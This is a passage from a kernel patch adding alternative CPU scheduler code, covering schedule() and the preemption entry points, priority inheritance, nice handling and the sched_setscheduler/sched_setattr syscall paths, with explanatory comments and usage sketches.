++	/*
++	 * If we are going to sleep and we have plugged IO queued,
++	 * make sure to submit it to avoid deadlocks.
++	 */
++	blk_flush_plug(tsk->plug, true);
++}
++
++static void sched_update_worker(struct task_struct *tsk)
++{
++	if (tsk->flags & (PF_WQ_WORKER | PF_IO_WORKER)) {
++		if (tsk->flags & PF_WQ_WORKER)
++			wq_worker_running(tsk);
++		else
++			io_wq_worker_running(tsk);
++	}
++}
++
++asmlinkage __visible void __sched schedule(void)
++{
++	struct task_struct *tsk = current;
++
++	sched_submit_work(tsk);
++	do {
++		preempt_disable();
++		__schedule(SM_NONE);
++		sched_preempt_enable_no_resched();
++	} while (need_resched());
++	sched_update_worker(tsk);
++}
++EXPORT_SYMBOL(schedule);
++
++/*
++ * synchronize_rcu_tasks() makes sure that no task is stuck in preempted
++ * state (have scheduled out non-voluntarily) by making sure that all
++ * tasks have either left the run queue or have gone into user space.
++ * As idle tasks do not do either, they must not ever be preempted
++ * (schedule out non-voluntarily).
++ *
++ * schedule_idle() is similar to schedule_preempt_disabled() except that it
++ * never enables preemption because it does not call sched_submit_work().
++ */
++void __sched schedule_idle(void)
++{
++	/*
++	 * As this skips calling sched_submit_work(), which the idle task does
++	 * regardless because that function is a nop when the task is in a
++	 * TASK_RUNNING state, make sure this isn't used someplace that the
++	 * current task can be in any other state. Note, idle is always in the
++	 * TASK_RUNNING state.
++	 */
++	WARN_ON_ONCE(current->__state);
++	do {
++		__schedule(SM_NONE);
++	} while (need_resched());
++}
++
++#if defined(CONFIG_CONTEXT_TRACKING_USER) && !defined(CONFIG_HAVE_CONTEXT_TRACKING_USER_OFFSTACK)
++asmlinkage __visible void __sched schedule_user(void)
++{
++	/*
++	 * If we come here after a random call to set_need_resched(),
++	 * or we have been woken up remotely but the IPI has not yet arrived,
++	 * we haven't yet exited the RCU idle mode. Do it here manually until
++	 * we find a better solution.
++	 *
++	 * NB: There are buggy callers of this function.  Ideally we
++	 * should warn if prev_state != CONTEXT_USER, but that will trigger
++	 * too frequently to make sense yet.
++	 */
++	enum ctx_state prev_state = exception_enter();
++	schedule();
++	exception_exit(prev_state);
++}
++#endif
++
++/**
++ * schedule_preempt_disabled - called with preemption disabled
++ *
++ * Returns with preemption disabled. Note: preempt_count must be 1
++ */
++void __sched schedule_preempt_disabled(void)
++{
++	sched_preempt_enable_no_resched();
++	schedule();
++	preempt_disable();
++}
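++
++/*
++ * Sketch of the expected calling pattern (preempt_count is 1 on entry
++ * and on return), modelled on how kthread() parks a freshly created
++ * thread:
++ *
++ *	__set_current_state(TASK_UNINTERRUPTIBLE);
++ *	preempt_disable();
++ *	...
++ *	schedule_preempt_disabled();
++ *	preempt_enable();
++ */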
++
++#ifdef CONFIG_PREEMPT_RT
++void __sched notrace schedule_rtlock(void)
++{
++	do {
++		preempt_disable();
++		__schedule(SM_RTLOCK_WAIT);
++		sched_preempt_enable_no_resched();
++	} while (need_resched());
++}
++NOKPROBE_SYMBOL(schedule_rtlock);
++#endif
++
++static void __sched notrace preempt_schedule_common(void)
++{
++	do {
++		/*
++		 * Because the function tracer can trace preempt_count_sub()
++		 * and it also uses preempt_enable/disable_notrace(), if
++		 * NEED_RESCHED is set, the preempt_enable_notrace() called
++		 * by the function tracer will call this function again and
++		 * cause infinite recursion.
++		 *
++		 * Preemption must be disabled here before the function
++		 * tracer can trace. Break up preempt_disable() into two
++		 * calls. One to disable preemption without fear of being
++		 * traced. The other to still record the preemption latency,
++		 * which can also be traced by the function tracer.
++		 */
++		preempt_disable_notrace();
++		preempt_latency_start(1);
++		__schedule(SM_PREEMPT);
++		preempt_latency_stop(1);
++		preempt_enable_no_resched_notrace();
++
++		/*
++		 * Check again in case we missed a preemption opportunity
++		 * between schedule and now.
++		 */
++	} while (need_resched());
++}
++
++#ifdef CONFIG_PREEMPTION
++/*
++ * This is the entry point to schedule() from in-kernel preemption
++ * off of preempt_enable.
++ */
++asmlinkage __visible void __sched notrace preempt_schedule(void)
++{
++	/*
++	 * If there is a non-zero preempt_count or interrupts are disabled,
++	 * we do not want to preempt the current task. Just return..
++	 */
++	if (likely(!preemptible()))
++		return;
++
++	preempt_schedule_common();
++}
++NOKPROBE_SYMBOL(preempt_schedule);
++EXPORT_SYMBOL(preempt_schedule);
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
++#ifndef preempt_schedule_dynamic_enabled
++#define preempt_schedule_dynamic_enabled	preempt_schedule
++#define preempt_schedule_dynamic_disabled	NULL
++#endif
++DEFINE_STATIC_CALL(preempt_schedule, preempt_schedule_dynamic_enabled);
++EXPORT_STATIC_CALL_TRAMP(preempt_schedule);
++#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
++static DEFINE_STATIC_KEY_TRUE(sk_dynamic_preempt_schedule);
++void __sched notrace dynamic_preempt_schedule(void)
++{
++	if (!static_branch_unlikely(&sk_dynamic_preempt_schedule))
++		return;
++	preempt_schedule();
++}
++NOKPROBE_SYMBOL(dynamic_preempt_schedule);
++EXPORT_SYMBOL(dynamic_preempt_schedule);
++#endif
++#endif
++
++/**
++ * preempt_schedule_notrace - preempt_schedule called by tracing
++ *
++ * The tracing infrastructure uses preempt_enable_notrace to prevent
++ * recursion and tracing preempt enabling caused by the tracing
++ * infrastructure itself. But as tracing can happen in areas coming
++ * from userspace or just about to enter userspace, a preempt enable
++ * can occur before user_exit() is called. This will cause the scheduler
++ * to be called when the system is still in usermode.
++ *
++ * To prevent this, the preempt_enable_notrace will use this function
++ * instead of preempt_schedule() to exit user context if needed before
++ * calling the scheduler.
++ */
++asmlinkage __visible void __sched notrace preempt_schedule_notrace(void)
++{
++	enum ctx_state prev_ctx;
++
++	if (likely(!preemptible()))
++		return;
++
++	do {
++		/*
++		 * Because the function tracer can trace preempt_count_sub()
++		 * and it also uses preempt_enable/disable_notrace(), if
++		 * NEED_RESCHED is set, the preempt_enable_notrace() called
++		 * by the function tracer will call this function again and
++		 * cause infinite recursion.
++		 *
++		 * Preemption must be disabled here before the function
++		 * tracer can trace. Break up preempt_disable() into two
++		 * calls. One to disable preemption without fear of being
++		 * traced. The other to still record the preemption latency,
++		 * which can also be traced by the function tracer.
++		 */
++		preempt_disable_notrace();
++		preempt_latency_start(1);
++		/*
++		 * Needs preempt disabled in case user_exit() is traced
++		 * and the tracer calls preempt_enable_notrace() causing
++		 * an infinite recursion.
++		 */
++		prev_ctx = exception_enter();
++		__schedule(SM_PREEMPT);
++		exception_exit(prev_ctx);
++
++		preempt_latency_stop(1);
++		preempt_enable_no_resched_notrace();
++	} while (need_resched());
++}
++EXPORT_SYMBOL_GPL(preempt_schedule_notrace);
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
++#ifndef preempt_schedule_notrace_dynamic_enabled
++#define preempt_schedule_notrace_dynamic_enabled	preempt_schedule_notrace
++#define preempt_schedule_notrace_dynamic_disabled	NULL
++#endif
++DEFINE_STATIC_CALL(preempt_schedule_notrace, preempt_schedule_notrace_dynamic_enabled);
++EXPORT_STATIC_CALL_TRAMP(preempt_schedule_notrace);
++#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
++static DEFINE_STATIC_KEY_TRUE(sk_dynamic_preempt_schedule_notrace);
++void __sched notrace dynamic_preempt_schedule_notrace(void)
++{
++	if (!static_branch_unlikely(&sk_dynamic_preempt_schedule_notrace))
++		return;
++	preempt_schedule_notrace();
++}
++NOKPROBE_SYMBOL(dynamic_preempt_schedule_notrace);
++EXPORT_SYMBOL(dynamic_preempt_schedule_notrace);
++#endif
++#endif
++
++#endif /* CONFIG_PREEMPTION */
++
++/*
++ * This is the entry point to schedule() from kernel preemption
++ * off of irq context.
++ * Note that this is called and returns with irqs disabled. This will
++ * protect us against recursive calling from irq.
++ */
++asmlinkage __visible void __sched preempt_schedule_irq(void)
++{
++	enum ctx_state prev_state;
++
++	/* Catch callers which need to be fixed */
++	BUG_ON(preempt_count() || !irqs_disabled());
++
++	prev_state = exception_enter();
++
++	do {
++		preempt_disable();
++		local_irq_enable();
++		__schedule(SM_PREEMPT);
++		local_irq_disable();
++		sched_preempt_enable_no_resched();
++	} while (need_resched());
++
++	exception_exit(prev_state);
++}
++
++int default_wake_function(wait_queue_entry_t *curr, unsigned mode, int wake_flags,
++			  void *key)
++{
++	WARN_ON_ONCE(IS_ENABLED(CONFIG_SCHED_DEBUG) && wake_flags & ~WF_SYNC);
++	return try_to_wake_up(curr->private, mode, wake_flags);
++}
++EXPORT_SYMBOL(default_wake_function);
++
++static inline void check_task_changed(struct task_struct *p, struct rq *rq)
++{
++	int idx;
++
++	/* Trigger resched if task sched_prio has been modified. */
++	if (task_on_rq_queued(p) && (idx = task_sched_prio_idx(p, rq)) != p->sq_idx) {
++		requeue_task(p, rq, idx);
++		check_preempt_curr(rq);
++	}
++}
++
++static void __setscheduler_prio(struct task_struct *p, int prio)
++{
++	p->prio = prio;
++}
++
++#ifdef CONFIG_RT_MUTEXES
++
++static inline int __rt_effective_prio(struct task_struct *pi_task, int prio)
++{
++	if (pi_task)
++		prio = min(prio, pi_task->prio);
++
++	return prio;
++}
++
++static inline int rt_effective_prio(struct task_struct *p, int prio)
++{
++	struct task_struct *pi_task = rt_mutex_get_top_task(p);
++
++	return __rt_effective_prio(pi_task, prio);
++}
++
++/*
++ * rt_mutex_setprio - set the current priority of a task
++ * @p: task to boost
++ * @pi_task: donor task
++ *
++ * This function changes the 'effective' priority of a task. It does
++ * not touch ->normal_prio like __setscheduler().
++ *
++ * Used by the rt_mutex code to implement priority inheritance
++ * logic. Call site only calls if the priority of the task changed.
++ */
++void rt_mutex_setprio(struct task_struct *p, struct task_struct *pi_task)
++{
++	int prio;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++
++	/* XXX used to be waiter->prio, not waiter->task->prio */
++	prio = __rt_effective_prio(pi_task, p->normal_prio);
++
++	/*
++	 * If nothing changed; bail early.
++	 */
++	if (p->pi_top_task == pi_task && prio == p->prio)
++		return;
++
++	rq = __task_access_lock(p, &lock);
++	/*
++	 * Set under pi_lock && rq->lock, such that the value can be used under
++	 * either lock.
++	 *
++	 * Note that there is a load of trickery in making this pointer cache work
++	 * right. rt_mutex_slowunlock()+rt_mutex_postunlock() work together to
++	 * ensure a task is de-boosted (pi_task is set to NULL) before the
++	 * task is allowed to run again (and can exit). This ensures the pointer
++	 * points to a blocked task -- which guarantees the task is present.
++	 */
++	p->pi_top_task = pi_task;
++
++	/*
++	 * For FIFO/RR we only need to set prio, if that matches we're done.
++	 */
++	if (prio == p->prio)
++		goto out_unlock;
++
++	/*
++	 * Idle task boosting is a no-no in general. There is one
++	 * exception, when PREEMPT_RT and NOHZ is active:
++	 *
++	 * The idle task calls get_next_timer_interrupt() and holds
++	 * the timer wheel base->lock on the CPU and another CPU wants
++	 * to access the timer (probably to cancel it). We can safely
++	 * ignore the boosting request, as the idle CPU runs this code
++	 * with interrupts disabled and will complete the lock
++	 * protected section without being interrupted. So there is no
++	 * real need to boost.
++	 */
++	if (unlikely(p == rq->idle)) {
++		WARN_ON(p != rq->curr);
++		WARN_ON(p->pi_blocked_on);
++		goto out_unlock;
++	}
++
++	trace_sched_pi_setprio(p, pi_task);
++
++	__setscheduler_prio(p, prio);
++
++	check_task_changed(p, rq);
++out_unlock:
++	/* Avoid rq from going away on us: */
++	preempt_disable();
++
++	__balance_callbacks(rq);
++	__task_access_unlock(p, lock);
++
++	preempt_enable();
++}
++#else
++static inline int rt_effective_prio(struct task_struct *p, int prio)
++{
++	return prio;
++}
++#endif
++
++void set_user_nice(struct task_struct *p, long nice)
++{
++	unsigned long flags;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++
++	if (task_nice(p) == nice || nice < MIN_NICE || nice > MAX_NICE)
++		return;
++	/*
++	 * We have to be careful, if called from sys_setpriority(),
++	 * the task might be in the middle of scheduling on another CPU.
++	 */
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	rq = __task_access_lock(p, &lock);
++
++	p->static_prio = NICE_TO_PRIO(nice);
++	/*
++	 * The RT priorities are set via sched_setscheduler(), but we still
++	 * allow the 'normal' nice value to be set - but as expected
++	 * it won't have any effect on scheduling until the task becomes
++	 * SCHED_NORMAL/SCHED_BATCH again:
++	 */
++	if (task_has_rt_policy(p))
++		goto out_unlock;
++
++	p->prio = effective_prio(p);
++
++	check_task_changed(p, rq);
++out_unlock:
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++}
++EXPORT_SYMBOL(set_user_nice);
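++
++/*
++ * Example: a background kthread demoting itself to the weakest nice
++ * level:
++ *
++ *	set_user_nice(current, MAX_NICE);
++ */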
++
++/*
++ * is_nice_reduction - check if nice value is an actual reduction
++ *
++ * Similar to can_nice() but does not perform a capability check.
++ *
++ * @p: task
++ * @nice: nice value
++ */
++static bool is_nice_reduction(const struct task_struct *p, const int nice)
++{
++	/* Convert nice value [19,-20] to rlimit style value [1,40]: */
++	int nice_rlim = nice_to_rlimit(nice);
++
++	return (nice_rlim <= task_rlimit(p, RLIMIT_NICE));
++}
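++
++/*
++ * E.g. nice 19 maps to the rlimit-style value 1 and nice -20 to 40,
++ * so the request passes whenever RLIMIT_NICE covers the target level.
++ */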
++
++/*
++ * can_nice - check if a task can reduce its nice value
++ * @p: task
++ * @nice: nice value
++ */
++int can_nice(const struct task_struct *p, const int nice)
++{
++	return is_nice_reduction(p, nice) || capable(CAP_SYS_NICE);
++}
++
++#ifdef __ARCH_WANT_SYS_NICE
++
++/*
++ * sys_nice - change the priority of the current process.
++ * @increment: priority increment
++ *
++ * sys_setpriority is a more generic, but much slower function that
++ * does similar things.
++ */
++SYSCALL_DEFINE1(nice, int, increment)
++{
++	long nice, retval;
++
++	/*
++	 * Setpriority might change our priority at the same moment.
++	 * We don't have to worry. Conceptually one call occurs first
++	 * and we have a single winner.
++	 */
++
++	increment = clamp(increment, -NICE_WIDTH, NICE_WIDTH);
++	nice = task_nice(current) + increment;
++
++	nice = clamp_val(nice, MIN_NICE, MAX_NICE);
++	if (increment < 0 && !can_nice(current, nice))
++		return -EPERM;
++
++	retval = security_task_setnice(current, nice);
++	if (retval)
++		return retval;
++
++	set_user_nice(current, nice);
++	return 0;
++}
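++
++/*
++ * Example: nice(5) from userspace arrives here with increment == 5 and
++ * moves a nice-0 caller to nice 5; raising the nice value (lowering
++ * priority) never requires CAP_SYS_NICE.
++ */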
++
++#endif
++
++/**
++ * task_prio - return the priority value of a given task.
++ * @p: the task in question.
++ *
++ * Return: The priority value as seen by users in /proc.
++ *
++ * sched policy              return value   kernel prio    user prio/nice
++ *
++ * (BMQ)normal, batch, idle  [0 ... 53]     [100 ... 139]  0/[-20 ... 19]/[-7 ... 7]
++ * (PDS)normal, batch, idle  [0 ... 39]     100            0/[-20 ... 19]
++ * fifo, rr                  [-1 ... -100]  [99 ... 0]     [0 ... 99]
++ */
++int task_prio(const struct task_struct *p)
++{
++	return (p->prio < MAX_RT_PRIO) ? p->prio - MAX_RT_PRIO :
++		task_sched_prio_normal(p, task_rq(p));
++}
++
++/**
++ * idle_cpu - is a given CPU idle currently?
++ * @cpu: the processor in question.
++ *
++ * Return: 1 if the CPU is currently idle. 0 otherwise.
++ */
++int idle_cpu(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	if (rq->curr != rq->idle)
++		return 0;
++
++	if (rq->nr_running)
++		return 0;
++
++#ifdef CONFIG_SMP
++	if (rq->ttwu_pending)
++		return 0;
++#endif
++
++	return 1;
++}
++
++/**
++ * idle_task - return the idle task for a given CPU.
++ * @cpu: the processor in question.
++ *
++ * Return: The idle task for the cpu @cpu.
++ */
++struct task_struct *idle_task(int cpu)
++{
++	return cpu_rq(cpu)->idle;
++}
++
++/**
++ * find_process_by_pid - find a process with a matching PID value.
++ * @pid: the pid in question.
++ *
++ * The task of @pid, if found. %NULL otherwise.
++ */
++static inline struct task_struct *find_process_by_pid(pid_t pid)
++{
++	return pid ? find_task_by_vpid(pid) : current;
++}
++
++/*
++ * sched_setparam() passes in -1 for its policy, to let the functions
++ * it calls know not to change it.
++ */
++#define SETPARAM_POLICY -1
++
++static void __setscheduler_params(struct task_struct *p,
++		const struct sched_attr *attr)
++{
++	int policy = attr->sched_policy;
++
++	if (policy == SETPARAM_POLICY)
++		policy = p->policy;
++
++	p->policy = policy;
++
++	/*
++	 * Allow the normal nice value to be set, but it will not have any
++	 * effect on scheduling until the task becomes
++	 * SCHED_NORMAL/SCHED_BATCH:
++	 */
++	p->static_prio = NICE_TO_PRIO(attr->sched_nice);
++
++	/*
++	 * __sched_setscheduler() ensures attr->sched_priority == 0 when
++	 * !rt_policy. Always setting this ensures that things like
++	 * getparam()/getattr() don't report silly values for !rt tasks.
++	 */
++	p->rt_priority = attr->sched_priority;
++	p->normal_prio = normal_prio(p);
++}
++
++/*
++ * check the target process has a UID that matches the current process's
++ */
++static bool check_same_owner(struct task_struct *p)
++{
++	const struct cred *cred = current_cred(), *pcred;
++	bool match;
++
++	rcu_read_lock();
++	pcred = __task_cred(p);
++	match = (uid_eq(cred->euid, pcred->euid) ||
++		 uid_eq(cred->euid, pcred->uid));
++	rcu_read_unlock();
++	return match;
++}
++
++/*
++ * Allow unprivileged RT tasks to decrease priority.
++ * Only issue a capable test if needed and only once to avoid an audit
++ * event on permitted non-privileged operations:
++ */
++static int user_check_sched_setscheduler(struct task_struct *p,
++					 const struct sched_attr *attr,
++					 int policy, int reset_on_fork)
++{
++	if (rt_policy(policy)) {
++		unsigned long rlim_rtprio = task_rlimit(p, RLIMIT_RTPRIO);
++
++		/* Can't set/change the rt policy: */
++		if (policy != p->policy && !rlim_rtprio)
++			goto req_priv;
++
++		/* Can't increase priority: */
++		if (attr->sched_priority > p->rt_priority &&
++		    attr->sched_priority > rlim_rtprio)
++			goto req_priv;
++	}
++
++	/* Can't change other user's priorities: */
++	if (!check_same_owner(p))
++		goto req_priv;
++
++	/* Normal users shall not reset the sched_reset_on_fork flag: */
++	if (p->sched_reset_on_fork && !reset_on_fork)
++		goto req_priv;
++
++	return 0;
++
++req_priv:
++	if (!capable(CAP_SYS_NICE))
++		return -EPERM;
++
++	return 0;
++}
++
++static int __sched_setscheduler(struct task_struct *p,
++				const struct sched_attr *attr,
++				bool user, bool pi)
++{
++	const struct sched_attr dl_squash_attr = {
++		.size		= sizeof(struct sched_attr),
++		.sched_policy	= SCHED_FIFO,
++		.sched_nice	= 0,
++		.sched_priority = 99,
++	};
++	int oldpolicy = -1, policy = attr->sched_policy;
++	int retval, newprio;
++	struct balance_callback *head;
++	unsigned long flags;
++	struct rq *rq;
++	int reset_on_fork;
++	raw_spinlock_t *lock;
++
++	/* The pi code expects interrupts enabled */
++	BUG_ON(pi && in_interrupt());
++
++	/*
++	 * Alt schedule FW supports SCHED_DEADLINE by squashing it into prio 0 SCHED_FIFO
++	 */
++	if (unlikely(SCHED_DEADLINE == policy)) {
++		attr = &dl_squash_attr;
++		policy = attr->sched_policy;
++	}
++recheck:
++	/* Double check policy once rq lock held */
++	if (policy < 0) {
++		reset_on_fork = p->sched_reset_on_fork;
++		policy = oldpolicy = p->policy;
++	} else {
++		reset_on_fork = !!(attr->sched_flags & SCHED_RESET_ON_FORK);
++
++		if (policy > SCHED_IDLE)
++			return -EINVAL;
++	}
++
++	if (attr->sched_flags & ~(SCHED_FLAG_ALL))
++		return -EINVAL;
++
++	/*
++	 * Valid priorities for SCHED_FIFO and SCHED_RR are
++	 * 1..MAX_RT_PRIO-1, valid priority for SCHED_NORMAL,
++	 * SCHED_BATCH and SCHED_IDLE is 0.
++	 */
++	if (attr->sched_priority < 0 ||
++	    (p->mm && attr->sched_priority > MAX_RT_PRIO - 1) ||
++	    (!p->mm && attr->sched_priority > MAX_RT_PRIO - 1))
++		return -EINVAL;
++	if ((SCHED_RR == policy || SCHED_FIFO == policy) !=
++	    (attr->sched_priority != 0))
++		return -EINVAL;
++
++	if (user) {
++		retval = user_check_sched_setscheduler(p, attr, policy, reset_on_fork);
++		if (retval)
++			return retval;
++
++		retval = security_task_setscheduler(p);
++		if (retval)
++			return retval;
++	}
++
++	if (pi)
++		cpuset_read_lock();
++
++	/*
++	 * Make sure no PI-waiters arrive (or leave) while we are
++	 * changing the priority of the task:
++	 */
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++
++	/*
++	 * To be able to change p->policy safely, task_access_lock()
++	 * must be called.
++	 * If task_access_lock() is used here:
++	 * For a task p which is not running, reading rq->stop is
++	 * racy but acceptable, as ->stop doesn't change much.
++	 * An enhancement can be made to read rq->stop safely.
++	 */
++	rq = __task_access_lock(p, &lock);
++
++	/*
++	 * Changing the policy of the stop thread is a very bad idea
++	 */
++	if (p == rq->stop) {
++		retval = -EINVAL;
++		goto unlock;
++	}
++
++	/*
++	 * If not changing anything there's no need to proceed further:
++	 */
++	if (unlikely(policy == p->policy)) {
++		if (rt_policy(policy) && attr->sched_priority != p->rt_priority)
++			goto change;
++		if (!rt_policy(policy) &&
++		    NICE_TO_PRIO(attr->sched_nice) != p->static_prio)
++			goto change;
++
++		p->sched_reset_on_fork = reset_on_fork;
++		retval = 0;
++		goto unlock;
++	}
++change:
++
++	/* Re-check policy now with rq lock held */
++	if (unlikely(oldpolicy != -1 && oldpolicy != p->policy)) {
++		policy = oldpolicy = -1;
++		__task_access_unlock(p, lock);
++		raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++		if (pi)
++			cpuset_read_unlock();
++		goto recheck;
++	}
++
++	p->sched_reset_on_fork = reset_on_fork;
++
++	newprio = __normal_prio(policy, attr->sched_priority, NICE_TO_PRIO(attr->sched_nice));
++	if (pi) {
++		/*
++		 * Take priority boosted tasks into account. If the new
++		 * effective priority is unchanged, we just store the new
++		 * normal parameters and do not touch the scheduler class and
++		 * the runqueue. This will be done when the task deboosts
++		 * itself.
++		 */
++		newprio = rt_effective_prio(p, newprio);
++	}
++
++	if (!(attr->sched_flags & SCHED_FLAG_KEEP_PARAMS)) {
++		__setscheduler_params(p, attr);
++		__setscheduler_prio(p, newprio);
++	}
++
++	check_task_changed(p, rq);
++
++	/* Avoid rq from going away on us: */
++	preempt_disable();
++	head = splice_balance_callbacks(rq);
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++
++	if (pi) {
++		cpuset_read_unlock();
++		rt_mutex_adjust_pi(p);
++	}
++
++	/* Run balance callbacks after we've adjusted the PI chain: */
++	balance_callbacks(rq, head);
++	preempt_enable();
++
++	return 0;
++
++unlock:
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++	if (pi)
++		cpuset_read_unlock();
++	return retval;
++}
++
++static int _sched_setscheduler(struct task_struct *p, int policy,
++			       const struct sched_param *param, bool check)
++{
++	struct sched_attr attr = {
++		.sched_policy   = policy,
++		.sched_priority = param->sched_priority,
++		.sched_nice     = PRIO_TO_NICE(p->static_prio),
++	};
++
++	/* Fixup the legacy SCHED_RESET_ON_FORK hack. */
++	if ((policy != SETPARAM_POLICY) && (policy & SCHED_RESET_ON_FORK)) {
++		attr.sched_flags |= SCHED_FLAG_RESET_ON_FORK;
++		policy &= ~SCHED_RESET_ON_FORK;
++		attr.sched_policy = policy;
++	}
++
++	return __sched_setscheduler(p, &attr, check, true);
++}
++
++/**
++ * sched_setscheduler - change the scheduling policy and/or RT priority of a thread.
++ * @p: the task in question.
++ * @policy: new policy.
++ * @param: structure containing the new RT priority.
++ *
++ * Use sched_set_fifo(), read its comment.
++ *
++ * Return: 0 on success. An error code otherwise.
++ *
++ * NOTE that the task may be already dead.
++ */
++int sched_setscheduler(struct task_struct *p, int policy,
++		       const struct sched_param *param)
++{
++	return _sched_setscheduler(p, policy, param, true);
++}
++
++int sched_setattr(struct task_struct *p, const struct sched_attr *attr)
++{
++	return __sched_setscheduler(p, attr, true, true);
++}
++
++int sched_setattr_nocheck(struct task_struct *p, const struct sched_attr *attr)
++{
++	return __sched_setscheduler(p, attr, false, true);
++}
++EXPORT_SYMBOL_GPL(sched_setattr_nocheck);
++
++/**
++ * sched_setscheduler_nocheck - change the scheduling policy and/or RT priority of a thread from kernelspace.
++ * @p: the task in question.
++ * @policy: new policy.
++ * @param: structure containing the new RT priority.
++ *
++ * Just like sched_setscheduler, only don't bother checking if the
++ * current context has permission.  For example, this is needed in
++ * stop_machine(): we create temporary high priority worker threads,
++ * but our caller might not have that capability.
++ *
++ * Return: 0 on success. An error code otherwise.
++ */
++int sched_setscheduler_nocheck(struct task_struct *p, int policy,
++			       const struct sched_param *param)
++{
++	return _sched_setscheduler(p, policy, param, false);
++}
++
++/*
++ * SCHED_FIFO is a broken scheduler model; that is, it is fundamentally
++ * incapable of resource management, which is the one thing an OS really should
++ * be doing.
++ *
++ * This is of course the reason it is limited to privileged users only.
++ *
++ * Worse still; it is fundamentally impossible to compose static priority
++ * workloads. You cannot take two correctly working static prio workloads
++ * and smash them together and still expect them to work.
++ *
++ * For this reason 'all' FIFO tasks the kernel creates are basically at:
++ *
++ *   MAX_RT_PRIO / 2
++ *
++ * The administrator _MUST_ configure the system, the kernel simply doesn't
++ * know enough information to make a sensible choice.
++ */
++void sched_set_fifo(struct task_struct *p)
++{
++	struct sched_param sp = { .sched_priority = MAX_RT_PRIO / 2 };
++	WARN_ON_ONCE(sched_setscheduler_nocheck(p, SCHED_FIFO, &sp) != 0);
++}
++EXPORT_SYMBOL_GPL(sched_set_fifo);
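++
++/*
++ * Minimal in-kernel usage sketch for the helper above; the kthread
++ * name and function are hypothetical:
++ *
++ *	struct task_struct *tsk = kthread_run(my_fn, NULL, "my-rt-worker");
++ *	if (!IS_ERR(tsk))
++ *		sched_set_fifo(tsk);
++ */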
++
++/*
++ * For when you don't much care about FIFO, but want to be above SCHED_NORMAL.
++ */
++void sched_set_fifo_low(struct task_struct *p)
++{
++	struct sched_param sp = { .sched_priority = 1 };
++	WARN_ON_ONCE(sched_setscheduler_nocheck(p, SCHED_FIFO, &sp) != 0);
++}
++EXPORT_SYMBOL_GPL(sched_set_fifo_low);
++
++void sched_set_normal(struct task_struct *p, int nice)
++{
++	struct sched_attr attr = {
++		.sched_policy = SCHED_NORMAL,
++		.sched_nice = nice,
++	};
++	WARN_ON_ONCE(sched_setattr_nocheck(p, &attr) != 0);
++}
++EXPORT_SYMBOL_GPL(sched_set_normal);
++
++static int
++do_sched_setscheduler(pid_t pid, int policy, struct sched_param __user *param)
++{
++	struct sched_param lparam;
++	struct task_struct *p;
++	int retval;
++
++	if (!param || pid < 0)
++		return -EINVAL;
++	if (copy_from_user(&lparam, param, sizeof(struct sched_param)))
++		return -EFAULT;
++
++	rcu_read_lock();
++	retval = -ESRCH;
++	p = find_process_by_pid(pid);
++	if (likely(p))
++		get_task_struct(p);
++	rcu_read_unlock();
++
++	if (likely(p)) {
++		retval = sched_setscheduler(p, policy, &lparam);
++		put_task_struct(p);
++	}
++
++	return retval;
++}
++
++/*
++ * Mimics kernel/events/core.c perf_copy_attr().
++ */
++static int sched_copy_attr(struct sched_attr __user *uattr, struct sched_attr *attr)
++{
++	u32 size;
++	int ret;
++
++	/* Zero the full structure, so that a short copy will be nice: */
++	memset(attr, 0, sizeof(*attr));
++
++	ret = get_user(size, &uattr->size);
++	if (ret)
++		return ret;
++
++	/* ABI compatibility quirk: */
++	if (!size)
++		size = SCHED_ATTR_SIZE_VER0;
++
++	if (size < SCHED_ATTR_SIZE_VER0 || size > PAGE_SIZE)
++		goto err_size;
++
++	ret = copy_struct_from_user(attr, sizeof(*attr), uattr, size);
++	if (ret) {
++		if (ret == -E2BIG)
++			goto err_size;
++		return ret;
++	}
++
++	/*
++	 * XXX: Do we want to be lenient like existing syscalls; or do we want
++	 * to be strict and return an error on out-of-bounds values?
++	 */
++	attr->sched_nice = clamp(attr->sched_nice, -20, 19);
++
++	/* sched/core.c uses zero here but we already know ret is zero */
++	return 0;
++
++err_size:
++	put_user(sizeof(*attr), &uattr->size);
++	return -E2BIG;
++}
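++
++/*
++ * Illustrative userspace sketch (not kernel code): a binary built
++ * against the VER0 ABI passes a short structure; the memset() plus
++ * copy_struct_from_user() above zero-fill the newer fields it does
++ * not know about:
++ *
++ *	struct sched_attr attr = {
++ *		.size		= SCHED_ATTR_SIZE_VER0,
++ *		.sched_policy	= SCHED_FIFO,
++ *		.sched_priority	= 10,
++ *	};
++ *	syscall(SYS_sched_setattr, 0, &attr, 0);  (pid 0 means "self")
++ */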
++
++/**
++ * sys_sched_setscheduler - set/change the scheduler policy and RT priority
++ * @pid: the pid in question.
++ * @policy: new policy.
++ * @param: structure containing the new RT priority.
++ *
++ * Return: 0 on success. An error code otherwise.
++ */
++SYSCALL_DEFINE3(sched_setscheduler, pid_t, pid, int, policy, struct sched_param __user *, param)
++{
++	if (policy < 0)
++		return -EINVAL;
++
++	return do_sched_setscheduler(pid, policy, param);
++}
++
++/**
++ * sys_sched_setparam - set/change the RT priority of a thread
++ * @pid: the pid in question.
++ * @param: structure containing the new RT priority.
++ *
++ * Return: 0 on success. An error code otherwise.
++ */
++SYSCALL_DEFINE2(sched_setparam, pid_t, pid, struct sched_param __user *, param)
++{
++	return do_sched_setscheduler(pid, SETPARAM_POLICY, param);
++}
++
++/**
++ * sys_sched_setattr - same as above, but with extended sched_attr
++ * @pid: the pid in question.
++ * @uattr: structure containing the extended parameters.
++ * @flags: for future extension.
++ */
++SYSCALL_DEFINE3(sched_setattr, pid_t, pid, struct sched_attr __user *, uattr,
++			       unsigned int, flags)
++{
++	struct sched_attr attr;
++	struct task_struct *p;
++	int retval;
++
++	if (!uattr || pid < 0 || flags)
